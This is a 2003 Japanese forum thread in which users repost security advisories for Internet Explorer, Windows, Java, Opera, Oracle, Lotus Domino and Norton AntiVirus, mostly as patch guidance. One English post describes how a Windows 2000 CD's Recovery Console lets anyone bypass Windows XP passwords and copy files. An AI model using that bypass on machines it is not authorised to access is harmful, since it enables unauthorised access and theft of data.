この問題を修正した新しいセキュリティ修正プログラムを公開するまでの間、Windows NT 4.0
および Windows N 4.0 Terminal Server Edition の修正プログラムの公開を一時停止いたしました。

とのことです。今しばらく注視が必要のようです。
55窓板住人:03/02/05 20:32 ID:PACOGToP
SunのJavaに2点脆弱性、1点問題となるユーザインタフェイスが見受けられる様です。
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/02.html#20030205_java

脆弱性は、
Sun Alert ID: 50083
Java Virtual Machine May Allow Illegal Access to Protected Fields or Methods
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F50083&zone_32=category%3Asecurity

Sun Alert ID: 50081
Incorrect Certificate Validation in Java Secure Socket Extension (JSSE),
Java Plug-In and Java Web Start
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F50081&zone_32=category%3Asecurity

で、後者は署名付きJavaWebStart/Appletを信頼できない様です。
ま、とりあえず、
1.4.1 系列では、1.4.1_01 以降、1.4.0 系列では、1.4.0_03 以降、1.3.1 系列では、1.3.1_06 以降、
1.2.2 系列では、1.2.2_014 以降に更新することを推奨します。

ユーザインタフェイスは、デフォルトのボタンが推奨されるべき位置に無い、
ダイアログの文章表現が具体的脅威を表していない、などの問題のようです。
56名無しさん@お腹いっぱい。:03/02/05 23:52 ID:???
>>46-50
OPERA7.01で修正されてるようです。

Updated version 7.01 fixes flaws already
http://www.theinquirer.net/?article=7616
57名無しさん@お腹いっぱい。:03/02/06 09:10 ID:DTMyrIVj
煽り 荒らし コピペ荒らし
家ゲー板 家ゲー攻略板 PCゲー攻略板 ゲーハー板潰し
これで・・・・・・
やっと半分ってところだよ・・・・
もうワカったろう
滅茶苦茶にヤラれたンだよ メチャクチャに
現在ゲーム関連板は、絶望的な状況下を懸命に死と戦っている
今、我々のなすべきこと
それは、専用ブラウザを使い、状況を傍観することか?
俺たちは、教育集団でもなければ宗教団体でもない
俺たちゃよォ・・・・・・・
2ちゃんねらーだッッッッ
戦う団体なんだぜェッッ
荒らしを2ちゃんねる100の板に配布しろッッ
2ちゃんねらー300万の手で、必ず探し出せッッ
2ちゃんねらーは、後ろを見せんッッ
ゲーム関連板の無念を晴らすッッ
いいかァ!!!
58あぼーん:あぼーん
あぼーん
59窓板住人:03/02/06 10:35 ID:rsHsCZG+
すみません出遅れました。。。

【NET】IEに「緊急」の脆弱性、累積パッチリリース
http://news2.2ch.net/test/read.cgi/newsplus/1044493888/l50

MSJapanも資料作れていない様なので詳細はお待ちください。
家庭レベルではそのままWindowsUpdateを適用しても問題ないと思われます。。
60窓板住人:03/02/06 11:00 ID:rsHsCZG+
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-004ov.asp

MS03-004 に関する情報
「MS03-004: Internet Explorer 用の累積的な修正プログラム (810847) 」に
関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS02-068 : Internet Explorer 用の累積的な
修正プログラム (324929) で修正された問題に加えて、新たに 2 つの問題を
排除します。

対象となる製品
==============
・ Internet Explorer 6 Service Pack 1
・ Internet Explorer 6 for Windows XP
・ Internet Explorer 5.5 Service Pack 2
・ Internet Explorer 5.01 Service Pack 3 for Windows 2000
61窓板住人:03/02/06 11:03 ID:rsHsCZG+
注意:
Internet Explorer 6 の修正プログラムは、
Windows XP 環境にのみ適用可能です。
(IE6 for Windows XPの事だと思われます。 IE6 SP1は全バージョンで
適用可能のようです。上記リンク先にはIE6としか記述がないので注意してください)
Internet Explorer 5.01 Service Pack 3 の修正プログラムは、
Windows 2000 環境にのみ適用可能です。

修正プログラム
==============
(略・すべてWindowsUpdateまたは上記リンク先からダウンロード可能です)
注意: 64bit 版の Windows XP をお使いのお客様は、
以下の Internet Explorer 6 Service Pack 1 (64bit) の適用を
お願いします。(略)

詳細
====
この修正プログラムをインストールすることにより、
悪意のあるユーザーによる以下の攻撃を防ぐことができます。

(緊急) クロスドメイン セキュリティ モデルに含まれる 2 つの問題です。
セキュリティ ドメインのチェックに問題があり、
一つの Web サイトからの情報を、別のドメインの
Web アプリケーションに取得されてしまう可能性があります。

対策が行われていないシステムがインターネットなどのネットワークを通じて
他のコンピュータと接続している場合、この問題を悪用した攻撃を
受けることがあります。この攻撃は、受動的攻撃という悪意のある
ユーザーから送られた HTML 形式の電子メールからも攻撃を受ける
可能性があります。この攻撃は、ハッカーまたはクラッカーと呼ばれる
悪意のあるユーザーや、ワームといった自動的な攻撃を目的とした
悪意のあるプログラムから行われることがあります。
62窓板住人:03/02/06 11:05 ID:rsHsCZG+
この脆弱性を悪用されることにより、
以下のような実害を受ける事が考えられます。

意図しないアプリケーションが動作させられる可能性があります。
その結果、ワームの感染、データの削除、トロイの木馬の実行などが
考えられます。
・ ディスク上の任意のファイルが読み取られます。

日本語による詳細については、ただいま準備中です。
それまでの間、英語情報をご参照ください。

MS03-004: Cumulative Patch for Internet Explorer (810847)
http://www.microsoft.com/technet/security/bulletin/MS03-004.asp
63窓板住人:03/02/06 11:08 ID:rsHsCZG+
=====================================================
このニュースレターでは、セキュリティ情報をいち早くお知らせするために、
要約情報という形式でご案内いたします。
このセキュリティ情報の詳細につきましては、現在準備中です。
=====================================================
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-005ov.asp

MS03-005 に関する情報
「MS03-005: Windows リダイレクタの未チェックのバッファにより権限が
昇格する (810577)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、Windows XP の リダイレクタに含まれる未チェックのバッファに
より、不正なプログラムが実行される可能性がある問題です。最悪の場合、
悪意のあるユーザーにお客様のコンピューター上で任意のプログラムが
実行される可能性があります。

対象となる製品
==============
・Microsoft Windows XP


修正プログラム
==============
(略・Windows Updateまたは上記リンク先からダウンロードできます)
Windows XP または Windows XP SP1 の環境にインストールすることが
できます。
64窓板住人:03/02/06 11:08 ID:rsHsCZG+
詳細
====
この修正プログラムをインストールすることにより、悪意のある
ユーザーによる以下の攻撃を防ぐことができます。

(重要) Windows リダイレクタ (ネットワーク プレースの追加ウィザード
または NET USE コマンドで使用されます) に存在する未チェックの
バッファにより、バッファのオーバーラン攻撃が行われる問題です。

対策が行われていないシステムで、この脆弱性を悪用した攻撃により被害を
受ける可能性があります。これらの攻撃は、ハッカーまたはクラッカーと
呼ばれる悪意のあるユーザーにより引き起こされる事が考えられますので、
注意が必要です。この脆弱性を悪用されることにより、以下のような実害を
受ける事が考えられます。

・意図しないアプリケーションが動作させられる可能性があります。
その結果、ワームの感染、データの削除、トロイの木馬の実行などが
考えられます。

・Windows が異常終了されます。

日本語による詳細については、ただいま準備中です。
それまでの間、英語情報をご参照ください。

MS03-005: Unchecked Buffer in Windows Redirector Could Allow Privilege Elevation (810577)
http://www.microsoft.com/technet/security/bulletin/MS03-005.asp
65名無しさん@お腹いっぱい。:03/02/06 21:57 ID:???
キムキム兄やん
66名無しさん@お腹いっぱい。:03/02/07 02:06 ID:???
WindowsUpdate、また新しくなったのか?
まぁここがある限りは手動で拾うけど。
67名無しさん@お腹いっぱい。:03/02/07 02:42 ID:???

WindowsUpdateって、毎日やらないといけないのか?
68これもokでつか?:03/02/07 17:52 ID:???
69窓板住人 ◆winDOwS0aE :03/02/08 03:08 ID:???
>>68 もちろんありでしょ。
ユーザの皆様は十分に注意されてください。

P2PツールのWinnyにセキュリティホール
http://headlines.yahoo.co.jp/hl?a=20030207-00000007-vgb-sci
セキュリティホールmemoML
Winnyにクロスサイトスクリプティング脆弱性
任意のHTMLがイントラネットゾーンのセキュリティレベルで実行される危険性
http://memo.st.ryukoku.ac.jp/archive/200302.month/5410.html
70マジレス:03/02/08 13:22 ID:???
>>67
別にやらなくてもいいよ
71名無しさん@お腹いっぱい。:03/02/08 15:06 ID:???
パッチ自分で拾う方が良いって
72kng ◆XTitdn3QI6 :03/02/08 16:40 ID:???
>>54
修正されたのが公開されたようです。


Windows NT 4.0 および Windows NT 4.0 Terminal Server Edition の特定の
環境において、修正プログラムを適用することにより発生する問題を修正した
新しいセキュリティ修正プログラムを公開しました。

http://www.microsoft.com/japan/technet/security/bulletin/MS02-071.asp
73窓板住人 ◆winDOwS0aE :03/02/08 21:09 ID:???
Windows NTユーザのみ、重要な情報です。
他のバージョンでは以前公開されたUpdateから変更はありません。
NTユーザの方は以下のドキュメントを読み、Windows Updateでは更新出来ないことに
注意して対処を行ってください。

----------------------------------------------------------------
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-004.asp
================================================================
今回の更新内容
2003 年 1 月 20 日に Windows Update に誤って公開された
Windows NT 4.0 の修正プログラム候補についての 「お詫び」 を追記しました。
大変ご迷惑をお掛けしましたことを深くお詫び申し上げます。

Windows NT 4.0 の環境において、この修正プログラム候補をインストールされ
たお客様は、お手数ですが、2003 年 2 月 6 日に公開した本セキュリティ情報
より、 Internet Explorer 用の修正プログラムをダウンロードし、再適用を
お願いいたします。
================================================================

Internet Explorer 用の累積的な修正プログラム (810847) (MS03-004)

登録日 : 2003/2/6 更新日 : 2003/2/7
概要 :
このセキュリティ情報の対象となるユーザー :
Microsoft(R) Internet Explorer を使用しているお客様
脆弱性の影響 : 攻撃者により、ユーザーのシステムでコマンドが実行される可能性があります。
最大深刻度 : 緊急
推奨する対応策 :
お客様は直ちにこの修正プログラムをインストールして下さい。
74窓板住人 ◆winDOwS0aE :03/02/08 21:11 ID:???
影響を受けるソフトウェア :
・Microsoft Internet Explorer 5.01
・Microsoft Internet Explorer 5.5
・Microsoft Internet Explorer 6

問題 : 技術的な説明 : (略)
問題を緩和する要素 : (略)
深刻度 : 対象となるソフトウェアすべて 緊急
脆弱性識別番号 : (略)
テストしたバージョン :
マイクロソフトは Internet Explorer 6、5.5 および 5.01 のテストを行い、
これらの脆弱性による影響を評価しました。それ以前のバージョンに関しては
サポートの対象となっていないため、この脆弱性による影響は不明です。

修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロード
できます。
http://www.microsoft.com/windows/ie/downloads/critical/810847/default.asp (WU)
ダウンロード先のリストから [Japanese] を選択してください。

お詫び : Windows NT 4.0 の環境において、2003 年 1 月 20 日に
修正プログラム候補が Windows Update に誤って公開されました。お客様には
大変ご迷惑をお掛けしましたことを深くお詫び申し上げます。この
修正プログラムをインストールされたお客様は、お手数ですが、2003 年 2 月
6 日に公開した本セキュリティ情報より、 Internet Explorer 用の
修正プログラムをダウンロードし、再適用をお願いいたします。なお、以前の
修正プログラムをインストールされた環境では、Windows Update に
本修正プログラムが表示されません。現在、正しく検出できるよう
Windows Update を改良しております。
75窓板住人 ◆winDOwS0aE :03/02/08 21:11 ID:???
修正プログラムに関する追加情報 :
対象プラットフォーム :
・Internet Explorer 5.01 用の修正プログラムは、次のシステムで Internet
Explorer 5.01 Service Pack 3 を実行している場合に適用することができます。
: Windows 2000 Service Pack 3
・Internet Explorer 5.5 用の修正プログラムは Internet Explorer 5.5
Service Pack 2 を実行しているシステムにインストールすることができます。
・Internet Explorer 6 用の修正プログラムは、次のシステムで Internet Explorer 6 を実行しているシステムにインストールすることができます。
: Windows XP (Windows XP Service Pack 1 をインストールしていない場合)
・Internet Explorer 6 Service Pack 1 用の修正プログラムは、次のシステム
で Internet Explorer 6 Service Pack 1 を実行しているシステムに
インストールすることができます。
: Windows XP Service Pack 1、Windows
2000 Service Pack 3、Windows NT 4.0 Service Pack 6a、Windows Millennium
Edition または Windows 98

Windows のサポート ライフサイクルについての詳細は次の Web サイトを
ご覧ください。
http://www.microsoft.com/windows/lifecycle/desktop/business/components.mspx (英語情報)

この修正を含む予定のサービス パック :
Internet Explorer 6 に影響を及ぼす問題に対する修正プログラムは Internet
Explorer 6 Service Pack 2 に含まれる予定です。
76窓板住人 ◆winDOwS0aE :03/02/08 21:13 ID:???
再起動の必要性 : あり
修正プログラムのアンインストール : 不可
修正プログラムに含まれる過去の修正 : (略)
修正プログラムが正しくインストールされたかどうか確認する方法 : (略)

警告 :
この累積的な修正プログラムを適用すると、HTML ヘルプ 機能が使用できなく
なるようになります。この機能を復元するためには、更新された HTML ヘルプ
コントロール 811630) をダウンロードする必要があります。また、HTML ヘルプ
の最新情報がインストールされると、ヘルプ ファイルが showHelp メソッドで
開かれる時、次の制限が発生することに注意して下さい。

・showHelp とサポートされているプロトコルのみを使用して Web ページまたは
ヘルプ (chm) ファイルを開くことができます。
・HTML ヘルプによりサポートされているショートカット (英語情報) 機能は、
ヘルプ ファイルが showHelp で開かれる場合、無効になります。同じ CHM
ファイルがユーザーの手動によるダブルクリック、または HTMLHELP( ) API を
使用するローカル マシンのアプリケーションにより開かれる場合、これは
ショートカット機能に影響を及ぼしません。

他のセキュリティ修正プログラムの入手先 : (略)
詳細情報 :
・よく寄せられる質問 : マイクロソフトセキュリティ情報(MS03-004)
http://www.microsoft.com/japan/technet/security/bulletin/fq03-004.asp
・US マイクロソフトセキュリティ情報(MS03-004)
http://www.microsoft.com/technet/security/bulletin/ms03-004.asp

謝辞 : (略)
更新履歴 : (略)
77窓板住人 ◆winDOwS0aE :03/02/08 21:20 ID:???
ただし、>>73-76 について、MSは1月20日に誤って公開された、と公表してますが、
セキュリティホールmemoによると、それは正しく事実を反映していないようです
(私もNT4使っているのでほぼその状況を確認しています)

http://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/02.html#20030207
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/01.html#20030123_810847
78窓板住人 ◆winDOwS0aE :03/02/09 12:13 ID:newwDMs0
ちょっと話がそれるかもしれませんが、
MS、LAN内Windows Updateサーバ構築ソフトを提供
http://pc.2ch.net/test/read.cgi/pcnews/1025029154/
ですが、Software Update Services with Service Pack 1がリリースされ、
Windows 2000 のドメイン コントローラと Small Business Server
で使用可能になった模様です。
http://www.microsoft.com/japan/windows2000/windowsupdate/sus/

次に、
813926 - Windows XP SP1 と Windows XP SP1a の相違点
http://support.microsoft.com/default.aspx?scid=kb;ja;813926
XPにはSP1かSP1aを入れていれば良いが、SP1は現在は入手不可
と言う理解で良いみたいで。SP1->SP1aはしなくて良いと。
79test:03/02/09 12:59 ID:K0zfwgyC
http://www.ipa.go.jp/security/topics/newvirus/redlof.html

「VBS/Redlof」ウイルスに関する情報

このウイルスは、VBScriptで作成されたウイルスで、
Internet Explorer 5 以降がインストールされたWindows9x/Me/NT/2000/XP SP1環境下で動作します。

通常、ウイルスはメールを媒介として感染します。
ウイルスメールには添付ファイルは無く、
HTML形式のメール本文に埋め込まれたウイルススクリプトによって感染が引き起こされます。
また、感染したHTMLファイルをホームページに掲載することで、そのページを閲覧したユーザへも感染します。

このウイルスはMicrosoft VM が持つセキュリティホール(「Microsoft VM による ActiveX コンポ ーネントの制御」の脆弱性)を利用して、
ユーザに対する警告無しにウイルスを動作させる仕組みを持っているため、注意が必要です。
80:03/02/09 18:24 ID:FxVORgyn
テスト
81名無しさん@お腹いっぱい。:03/02/09 21:04 ID:???
>>66だが、WindowsUpdate、直ってたな。
やっぱり一時的な不具合だったのか?w
82名無しさん@お腹いっぱい。:03/02/10 13:30 ID:???
tst
83名無しさん@お腹いっぱい。:03/02/11 00:30 ID:lR2FYIGW
ITPro ニュース:日本語版Operaの最新バージョン「Opera 6.05」に
深刻なセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030210/2/
84窓板住人 ◆winDOwS0aE :03/02/11 01:32 ID:l8g3TOZl
スラマー対策が原因でネット接続の障害も JPRS
 日本レジストリサービス(JPRS)は、ワーム「スラマー」の対策として
ポートUDP1434を送受信先とした通信を全面的にフィルタリングすると、
インターネットの利用ができなくなる場合があるとして、ISPなどに注意を
呼びかけている。DNS(ドメイン・ネーム・システム)からの応答について、
UDP1434が利用されるケースがあるためで、JPRSでは、セキュリティー
ホールをふさぐなど別の対策を求めている。

http://www.mainichi.co.jp/digital/network/archive/200302/10/1.html

ウィルス・ワーム等への対処としてフィルタリングを行う場合の注意
http://jpinfo.jp/topics/030207.html
85むむむ ◆MUMUMUkopk :03/02/12 00:49 ID:???
Opera 6.05 と 7.01 に >>46-50>>83 とは別の問題が見つかった模様。

Security Advisory
Beauchamp Security: Java-Applet crashes Opera 6.05 and 7.01

Applet crashes Opera 6.05 and 7.01
===================================================
Vendor: Opera
Versions affected: Opera 6.05 / 7.01
Date: 3rd February 2003
Type of Vulnerability: Client DoS
Severity: High
Discovered by: Marc Schoenefeld, [email protected]
Online location: http://www.illegalaccess.org/java/OperaCall2.html
===================================================

引用元: http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0063.html
86名無しさん@お腹いっぱい。:03/02/13 03:50 ID:???
OS(Windows系)限定のセキュリティ情報スレッドがいいなぁ
マイナーブラウザの情報は、該当スレッドのほうが読みやすいし
87 :03/02/13 12:46 ID:???
ワタシはOperaでも乗せてもらった方がありがたい。
結構ここ頼りになるし、Javaなんかはほかでも影響が出そうな話だからね。

むむむ ◆MUMUMUkopkさん、窓板住人 ◆winDOwS0aEさん、ほかの名無しの皆さん
いつも有り難う。
おかげで安心してWinを使えるよ。
88test:03/02/13 19:40 ID:Yayf6TGf
直リン倶楽部から
Update for Ie6.0 sp1
for q810847を当ててMSNの調子が悪くなった方
http://www.microsoft.com/windows/ie/downloads/critical/813951/default.asp
http://support.microsoft.com/?kbid=813951
89test:03/02/13 19:42 ID:Yayf6TGf
90窓板住人 ◆winDOwS0aE :03/02/14 00:52 ID:LTsFfiYg
>>87 どもですー。
>>88 >>89の詳しい情報です。

----------------------------------------------------------------
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-004.asp
================================================================
今回の更新内容
このセキュリティ情報ページを更新し、いくつかのシナリオで、
この修正プログラムにより発生する、セキュリティに関連しない問題を
解決する修正プログラムが入手可能になったことをお知らせしました。
================================================================
Internet Explorer 用の累積的な修正プログラム (810847) (MS03-004)

登録日 : 2003/2/6 更新日 : 2003/2/13
概要 : このセキュリティ情報の対象となるユーザー :
MicrosoftR Internet Explorer を使用しているお客様
脆弱性の影響 : 攻撃者により、ユーザーのシステムでコマンドが実行される可能性があります。
最大深刻度 : 緊急
推奨する対応策 : お客様は直ちにこの修正プログラムをインストールして下さい。
影響を受けるソフトウェア :
・Microsoft Internet Explorer 5.01
・Microsoft Internet Explorer 5.5
・Microsoft Internet Explorer 6
91窓板住人 ◆winDOwS0aE :03/02/14 00:53 ID:LTsFfiYg
問題 : 技術的な説明 :
このセキュリティ情報のリリース後に、この修正プログラムにセキュリティには
関連しない問題が確認されました。その問題とは特定の状況で、ユーザー、主に
コンシューマに影響を及ぼす可能性があります。具体的には、この問題により、
購読ベースの Web サイトや MSN 電子メールなど、特定のインターネット Web
サイトに認証できなくなる可能性があります。この問題は解決され、この問題を
修正する修正プログラムは 813951 で提供されています。この修正
プログラムは特定のセキュリティに関連しない問題を修正するものであり、この
セキュリティ情報で説明されている修正プログラムは、後半で説明されている
脆弱性を排除するにあたり、有効でした。また、現在でも有効です。今回
お知らせしている修正プログラムの入手方法に関する詳細など、さらに詳しい情報は
http://www.microsoft.com/windows/ie/downloads/critical/813951/default.asp
(英語情報。ダウンロードに関しては [Japanese] を選択して下さい。) および
「よく寄せられる質問」 をご覧下さい。
これは累積的な修正プログラムで、 Internet Explorer 5.01、5.5、6 用に以前
リリースされたすべての修正プログラムの機能を含みます。さらに、次の新たに
確認された 2 つの脆弱性を排除します。これらの脆弱性は、異なるドメインの
ウィンドウが情報を共有しないようにする Internet Explorer の
クロスドメイン セキュリティ モデルに関連します。(以降略)
92窓板住人 ◆winDOwS0aE :03/02/14 00:53 ID:LTsFfiYg
問題を緩和する要素 : (略)
深刻度 :
Internet Explorer 5.01 緊急
Internet Explorer 5.5 緊急
Internet Explorer 6 緊急
上記の評価はこの脆弱性の影響を受けるシステムの種類、システムの典型的な
展開形式およびこの脆弱性がシステムに及ぼす影響に基づいています。

脆弱性識別番号 : (略)
テストしたバージョン :マイクロソフトは Internet Explorer 6、5.5 および 5.01 のテストを行い(略)
修正プログラム : (略・上記リンク先からダウンロード可能です)
お詫び : Windows NT 4.0 の環境において、2003 年 1 月 20 日に修正
プログラム候補が Windows Update に誤って公開されました。お客様には大変
ご迷惑をお掛けしましたことを深くお詫び申し上げます。この修正プログラムを
インストールされたお客様は、お手数ですが、2003 年 2 月 6 日に公開した
本セキュリティ情報より、 Internet Explorer 用の修正プログラムを
ダウンロードし、再適用をお願いいたします。なお、以前の修正プログラムを
インストールされた環境では、Windows Update に本修正プログラムが表示
されません。現在、正しく検出できるよう Windows Update を改良しております。
93窓板住人 ◆winDOwS0aE :03/02/14 00:54 ID:LTsFfiYg
修正プログラムに関する追加情報 :
対象プラットフォーム :(略・上記リンク先を参照することを推奨します)
この修正を含む予定のサービス パック : (略)
再起動の必要性 : あり
修正プログラムのアンインストール : 不可
修正プログラムに含まれる過去の修正 : MS02-068 MS02-066
修正プログラムが正しくインストールされたかどうか確認する方法 : (略)
警告 : (略・上記リンク先参照)
他のセキュリティ修正プログラムの入手先 : (略)

詳細情報 :
・よく寄せられる質問 : マイクロソフトセキュリティ情報(MS03-004)
http://www.microsoft.com/japan/technet/security/bulletin/fq03-004.asp
・US マイクロソフトセキュリティ情報(MS03-004)
http://www.microsoft.com/technet/security/bulletin/ms03-004.asp
・サポート技術情報 (KB) 文書番号 : JP810847
[IE] [MS03-004] Internet Explorer 用の累積的な修正プログラム
(2003 年 2 月)

謝辞 :(略)
更新履歴 :
・2003/2/6 : このセキュリティ情報ページを公開しました。
・2003/2/7: 修正プログラムの対象プラットフォームに関する追加の説明を提供
するため、このセキュリティ情報を更新しました。
・2003/2/7: 2003 年 1 月 20 日に Windows Update に誤って公開された
Windows NT 4.0 の修正プログラム候補についての 「お詫び」 を追記しました。
・2003/2/10: この問題に対する日本語版 KB を公開しました。
・2003/2/12: 修正プログラムの対象プラットフォームに関するさらに詳しい
説明を提供するため、このセキュリティ情報を更新しました。
・2003/2/13: このセキュリティ情報ページを更新し、いくつかのシナリオで、
この修正プログラムにより発生する、セキュリティに関連しない問題を解決する
修正プログラムが入手可能になったことをお知らせしました。
94むむむ ◆MUMUMUkopk :03/02/14 23:21 ID:???
■シマンテック製品のLiveUpdate機能にファイルが更新できない不具合、対策を公開

 株式会社シマンテックは、同社のウイルス対策製品において、ウイルス定義ファイル
の更新を行なう機能「LiveUpdate」が正常にできない問題について、対応策を公開した。

 この問題は、シマンテックのウイルス対策製品利用ユーザーがウイルス定義ファイル
を更新する際に利用する「LiveUpdate」機能が利用できなくなるというもの。
(中略)
壊れている可能性があるファイルは、1月29日付けのLiveUpdateの更新パッケージ
保持情報で、この日付のLiveUpdateの更新パッケージをアップデートしていない
ユーザーは、対象とはならない。

 対応策は、特定のフォルダ内に保存されているファイルやフォルダを全て削除し、
損傷している更新パッケージ保持情報を削除する必要がある。保存されている
フォルダは以下の通り、
(略―引用元を参照)
 また、Tempフォルダに格納されているファイルも全て削除しなければならない。
Tempフォルダを表示して、削除する方法は、以下の通り、
(略―引用元を参照)
 これらの作業を行なった後、再度LiveUpdateを行なえば、問題は解決するという。
(以上、2003年2月14日のInternet Watchより一部引用―全文は引用元を参照)

引用元: http://internet.watch.impress.co.jp/www/article/2003/0214/symantec.htm
95 :03/02/15 20:19 ID:???
XP passwords rendered useless

Anyone with a Windows 2000 CD can boot up a Windows XP box and
start the Windows 2000 Recovery Console, a troubleshooting program.

Windows XP then allows the visitor to operate as Administrator
without a password, even if the Administrator account has a strong password.

The visitor can also operate in any of the other user accounts
that may be present on the XP machine, even if those accounts have passwords.

Unbelievably, the visitor can copy files from the hard disk to a floppy disk
or other removable media - something even an Administrator is normally prevented from doing when using the Recovery Console.

http://www.briansbuzz.com/w/030213/
96むむむ ◆MUMUMUkopk :03/02/16 23:07 ID:???
97窓板住人 ◆winDOwS0aE :03/02/18 01:17 ID:KcX2sbb7
先越されました・・・

【セキュリュティ】ソニーの「ネットワークバイオ」にセキュリティ脆弱性(2003.2.17)
http://news2.2ch.net/test/read.cgi/newsplus/1045497969/l50
https://www.netsecurity.ne.jp/article/1/8731.html
http://vcl.vaio.sony.co.jp/notices/security/info23.html
http://vcl.vaio.sony.co.jp/notices/security/info24.html
98むむむ ◆MUMUMUkopk :03/02/18 02:42 ID:???
今、某MLに続々とOracleの脆弱性がメールされております。
まとめて流すことにするです。
99むむむ ◆MUMUMUkopk :03/02/19 01:07 ID:???
Oracle脆弱性(5件):

Name: Oracle unauthenticated remote system compromise
Systems Affected: All platforms; Oracle9i Database Release 2, 9i Release 1,
8i, 8.1.7, 8.0.6
Severity: Critical Risk
Category: Remote System Buffer Overrun
引用元: http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0073.html

Name: Oracle TO_TIMESTAMP_TZ Remote System Buffer Overrun
Systems Affected: All platforms; Oracle9i Database Release 2, 9i Release 1,
8i, 8.1.7, 8.0.6
Severity: High Risk
Category: Remote System Buffer Overrun
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0074.html

Name: Oracle TZ_OFFSET Remote System Buffer Overrun
Systems Affected: All platforms; Oracle9i Database Release 2, 9i Release 1,
8i, 8.1.7, 8.0.6
Severity: High Risk
Category: Remote System Buffer Overrun
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0075.html
(続く)
100むむむ ◆MUMUMUkopk :03/02/19 01:08 ID:???
(続き)
Name: Oracle9i Application Server Format String Vulnerability
Systems Affected: All platforms; Oracle9i Application Server Release 9.0.2
Severity: Critical Risk
Category: Format String Vulnerability
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0076.html

Name: ORACLE bfilename function buffer overflow vulnerability
Systems Affected: All platforms; Oracle9i Database Release 2, 9i Release 1,
8i, 8.1.7, 8.0.6
Severity: High Risk
Category: Remote System Buffer Overrun
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0083.html
101むむむ ◆MUMUMUkopk :03/02/19 01:15 ID:???
Lotus Dominoの脆弱性(5件):

Name: Lotus Domino Web Server Host/Location Buffer Overflow Vulnerability
Systems Affected: Release 6.0
Severity: Critical Risk
Category: Remote System Buffer Overrun
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0080.html

Name: Lotus Domino Web Server iNotes Overflow
Systems Affected: Release 6.0
Severity: Critical Risk
Category: Remote System Buffer Overrun
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0081.html

Name: Lotus iNotes Client ActiveX Control Buffer Overrun
Systems Affected: Release 6.0
Severity: Medium Risk
Category: Remote System Buffer Overrun
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0082.html

(続き)
102むむむ ◆MUMUMUkopk :03/02/19 01:18 ID:???
103むむむ ◆MUMUMUkopk :03/02/19 14:09 ID:???
■Norton AntiVirus 2002にセキュリティホール

概要:
-----
Symantec Norton AntiVirus 2002 の受信メールスキャン機能には Buffer
Overflow を発生させてしまう問題があります。

問題:
-----
Symantec Norton AntiVirus 2002 の受信メールスキャン機能には、異常に
長いファイル名を持つファイルを圧縮したファイルを添付した電子メールの
スキャンを行う際に Buffer Overflow を発生させてしまう問題があります。

この問題を利用することで、リモートの攻撃者はログオン中のユーザの権限
で任意のコードを実行させることが可能です。

問題を確認したバージョン:
-------------------------
Symantec Norton AntiVirus 2002 (バージョン 8.07.17C)

問題を確認した OS:
------------------
Windows 2000 Professional 日本語版 + Windows 2000 Service Pack 3

(次に続く)
104むむむ ◆MUMUMUkopk :03/02/19 14:09 ID:???
>>103 続き

対策:
-----
LiveUpdate を使用し、製品およびコンポーネントを最新版にすることにより
この問題を修正できます。

発見者:
-------
新井 悠 [email protected]

謝辞:
-----
Symantec Security Response

免責:
-----
このアドバイザリで示される情報は予告なしに改定されることがあり、かつ、あ
るがままの形で提供されます。この情報を適用し生起される結果のリスクは利用
者が負うものとし、株式会社ラックは一切の責任を負わないものとします。

再配布について:
---------------
このアドバイザリの再配布は、下記条件を満たす限り自由です。

発行元 URL として、以下の URL を明記する。
http://www.lac.co.jp/security/intelligence/SNSAdvisory/61.html

------------------------------------------------------------------
Secure Net Service(SNS) Security Advisory <[email protected]>
Computer Security Laboratory, LAC http://www.lac.co.jp/security/
105test:03/02/20 01:13 ID:itErXti5
http://www.idefense.co.jp/security.html

Word文章に感染するToluマクロウィルス
広告宣伝メールを作成するTellaFriendトロイの木馬
106名無しさん@お腹いっぱい。:03/02/20 01:35 ID:HFHv5NJF
107むむむ ◆MUMUMUkopk :03/02/20 02:03 ID:???
■IE用セキュリティパッチMS03-004を適用すると、Outlook Expressが正しく動かなくなる

 マイクロソフト株式会社は、Internet Explorerのセキュリティパッチ「MS03-004」を
適用すると、Outlook Expressが正しく動かない現象が起きると発表した。現在、
マイクロソフトは原因を調査している段階で、修正プログラムは未だ提供されていない。
(中略)
 実際に起きる不具合は、「MS03-004」適用後、Outlook Expressで新規メールを
作成中に、ワードパットなどの他アプリケーションから文章を引用すると、以下の
エラーが発生する場合があるという。
(中略)
 マイクロソフトでは、この問題を認識・調査している段階であり、この問題を修正
するプログラムを作成中だとしている。
(以上、2003年2月20日のInternet Watchより一部引用―全文は引用元を参照)

引用元: http://internet.watch.impress.co.jp/www/article/2003/0219/microsoft.htm
MSのアナウンス: http://support.microsoft.com/default.aspx?scid=kb;ja;814803
108あぼーん:あぼーん
あぼーん
109むむむ ◆MUMUMUkopk :03/02/20 11:19 ID:???
>>98-100
CERT/CC からも出ました。

CERT Advisory CA-2003-05 Multiple Vulnerabilities in Oracle Servers
http://www.cert.org/advisories/CA-2003-05.html
110名無しさん@お腹いっぱい。:03/02/20 15:53 ID:???
